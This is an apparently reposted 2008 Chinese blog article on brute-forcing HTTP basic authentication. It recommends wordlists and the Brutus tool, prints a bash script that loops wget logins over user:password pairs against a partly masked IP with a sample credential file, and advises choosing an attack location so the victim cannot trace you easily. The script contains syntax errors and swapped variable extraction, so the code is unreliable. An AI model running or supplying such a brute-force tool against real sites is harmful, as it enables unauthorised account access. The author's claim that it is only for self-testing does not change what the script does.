科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道暴力破解HTTP验证检测页面口令强度

暴力破解HTTP验证检测页面口令强度

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

首先,你总得有像样的字典吧。去国外网站上下Wordlist吧,或者自己写个简单的程序来生成字典。如果不会写程序,呵呵呵呵,那就下载字典生成程序吧 。

作者:邹可见 来源:赛迪网-IT博客 2008年3月31日

关键字: Web安全

  • 评论
  • 分享微博
  • 分享邮件

【赛迪网-IT技术报道】首先,你总得有像样的字典吧。去国外网站上下Wordlist吧,或者自己写个简单的程序来生成字典。如果不会写程序,呵呵呵呵,那就下载字典生成程序吧 。(不过网上下的wordlist,或者用网上下的字典生成程序生成的字典,好像都不好用)

其次,你总得有工具来运用字典干活吧。可以从网上下载工具,比如大名鼎鼎的brutus。运行时的界面如下:

当然,也可以自己写工具。笔者就写了一个简单的脚本来干活:

#!/bin/bash
#
user_password_file=/root/wget_cracker_user_password
while read user_password ; do
 user=$(user_password#:}
 password=$(user_password%:}
 wget -q -t 2 -T 15 --http-user=$user --http-password=$password -http://219.136.x.x:8080/tool.asp 
 if [ $? -eq 0 ] ; then
  echo "OK I got an password:     user: $user ; password: $password !"
        exit 0
 fi
done < $user_password_file
exit 0
-bash-3.00# cat wget_cracker_user_password 
abc:adeeffaf
deff:afkafsasf
guest:affaewf
guest:guest
guest:afdasf

再次,你应该清楚:暴力破解不是SYN攻击,IP 欺骗是不可能的,你的老巢在哪里,受害者一眼就能看出来。所以,好好选择“狙击地”吧。搞不好会吃官司的哦。

最后,本人进行HTTP验证暴力破解,只是验证自己保护的WEB页面口令的强度,绝不会去给别人的网站添麻烦。切记。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章